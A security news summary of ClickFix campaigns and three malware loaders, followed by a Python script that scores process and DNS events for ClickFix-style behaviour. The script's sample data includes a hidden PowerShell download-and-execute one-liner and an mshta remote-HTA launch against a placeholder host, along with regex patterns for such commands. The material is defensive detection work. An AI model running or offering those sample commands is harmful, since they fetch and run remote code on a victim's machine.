ClickFix Campaigns Expand Malware Delivery With New Loaders and Fake Update Lures

The Hacker News, Jun 16, 2026

Why It Matters

The evolution of ClickFix‑based loaders shows attackers can rapidly adapt delivery methods, raising the risk of undetected compromise for enterprises and critical sectors. Defenders must update detection and user‑education strategies to counter these increasingly modular threats.

Key Takeaways

  • ClickFix lures trick users into running PowerShell commands from fake Windows update prompts
  • BabaDeda Loader profiles hosts, avoids Russian/Belarusian systems, injects into svchost.exe
  • Lorem Ipsum Loader uses WordPress sites and old Node.js to drop malware
  • Potemkin loader employs DGA and custom cipher for stealthy C2 communication
  • ClickFix remains effective because it mimics simple, authoritative troubleshooting steps

Pulse Analysis

The ClickFix technique has resurfaced as a low‑cost, high‑impact vector, leveraging familiar “press Win+R, paste this” instructions that users readily obey. By masquerading as legitimate Windows or Edge updates, attackers sidestep traditional download filters and exploit the trust users place in system‑generated prompts. The recent disruption of the Fox Tempest signing‑as‑a‑service platform eliminated the convenience of signed installers, prompting threat groups to adopt unsigned, command‑line‑based delivery that is harder for signature‑based tools to flag.

At the core of these campaigns are three distinct loaders. BabaDeda continues its legacy of stealth by profiling the host, skipping Russian or Belarusian machines, and injecting payloads into trusted processes like svchost.exe. Lorem Ipsum, linked to the Vanilla Tempest actor, hijacks compromised WordPress sites and an outdated Node.js runtime to unpack a ZIP archive that ultimately drops a backdoor and ransomware. Potemkin, uncovered by Huntress, uses a domain‑generation algorithm and a custom byte cipher to hide its C2 traffic, then reflectively loads modules such as EtherRAT and RMMProject, enabling credential theft and lateral movement across networks.

For security teams, the modular nature of these loaders demands a shift from signature reliance to behavior‑based detection. Monitoring for anomalous PowerShell execution, unexpected DLL side‑loading, and unusual DGA‑related DNS queries can surface early indicators of compromise. Endpoint protection should enforce strict application control, block unsigned MSI/HTA execution, and sandbox PowerShell scripts before they run. Finally, user education remains vital: reinforcing that legitimate updates never require manual command entry can blunt the human element that ClickFix exploits, while platform‑level mitigations like Apple’s new macOS Terminal warning add another layer of defense.
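The two behavioural signals the paragraph above recommends, a script host spawned straight from the Run dialog with a suspicious command line and DGA-looking DNS queries, can be turned into simple scoring logic. The script below is an added example written for this summary; it is not code from The Hacker News, Huntress or any of the named research teams. Every event in it is constructed, the hostnames use the reserved `.invalid` TLD, and the indicator weights and thresholds are illustrative starting points rather than tuned values.

```python
import math
import re
from collections import Counter

# Constructed sample telemetry for the demo (not data from the campaigns in
# the article). Process events: (parent_image, image, command_line).
SAMPLE_PROCESS_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient)"
     ".DownloadString('http://placeholder.invalid/fix')\""),
    ("code.exe", "powershell.exe", "powershell -File build.ps1"),
    ("explorer.exe", "mshta.exe", "mshta http://placeholder.invalid/update.hta"),
    ("svchost.exe", "powershell.exe",
     "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\inventory.ps1"),
]
# DNS events: (host, queried_name). The second label is constructed to look
# machine-generated; the others are ordinary service names.
SAMPLE_DNS_EVENTS = [
    ("ws01", "update.placeholder.invalid"),
    ("ws01", "xk7q2vzr9pltm4wj.placeholder.invalid"),
    ("ws02", "login.placeholder.invalid"),
]

# A Win+R "paste this" command runs as a direct child of explorer.exe. That
# pairing alone is common on workstations, so it is weighted but not decisive.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits typical of pasted one-liners (hidden window, download
# cradle, in-memory execution). Each hit adds one point.
CMDLINE_INDICATORS = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("policy_bypass", re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I)),
    ("hta_launch", re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
]


def score_process_event(parent, image, cmdline):
    """Return (score, matched_indicator_names) for one process-creation event."""
    hits = []
    if parent.lower() in RUN_DIALOG_PARENTS and image.lower() in SCRIPT_HOSTS:
        hits.append("script_host_from_run_dialog")
    for name, pattern in CMDLINE_INDICATORS:
        if pattern.search(cmdline):
            hits.append(name)
    # The parent/child pairing counts double: a user pasting a command, rather
    # than an installer running, is the behaviour ClickFix is built on.
    score = sum(2 if h == "script_host_from_run_dialog" else 1 for h in hits)
    return score, hits


def flag_process_events(events, threshold=3):
    """Indices of events whose combined score reaches the threshold."""
    return [i for i, (p, img, cmd) in enumerate(events)
            if score_process_event(p, img, cmd)[0] >= threshold]


def label_entropy(label):
    """Shannon entropy in bits per character of a single hostname label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_dga_like(qname, min_len=12, min_entropy=3.5, max_vowel_ratio=0.25):
    """Heuristic: a long, high-entropy, vowel-poor leftmost label."""
    label = qname.split(".")[0].lower()
    if len(label) < min_len:
        return False
    vowels = sum(ch in "aeiou" for ch in label)
    return (label_entropy(label) >= min_entropy
            and vowels / len(label) <= max_vowel_ratio)


def flag_dns_events(events):
    """Indices of DNS events whose queried name looks algorithmically generated."""
    return [i for i, (_host, qname) in enumerate(events) if is_dga_like(qname)]


if __name__ == "__main__":
    for i in flag_process_events(SAMPLE_PROCESS_EVENTS):
        score, hits = score_process_event(*SAMPLE_PROCESS_EVENTS[i])
        print(f"process event {i}: score={score} indicators={hits}")
    for i in flag_dns_events(SAMPLE_DNS_EVENTS):
        print(f"dns event {i}: DGA-like query {SAMPLE_DNS_EVENTS[i][1]}")
```

On the constructed input the first and third process events are flagged (Run-dialog parent plus download cradle or HTA launch), while the scheduled inventory script and the developer's build script stay below the threshold. The DNS heuristic is deliberately crude: CDN and telemetry hostnames also produce random-looking labels, so in a real deployment pair it with an allowlist and corroborating signals such as bursts of NXDOMAIN responses from one host before raising an alert.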
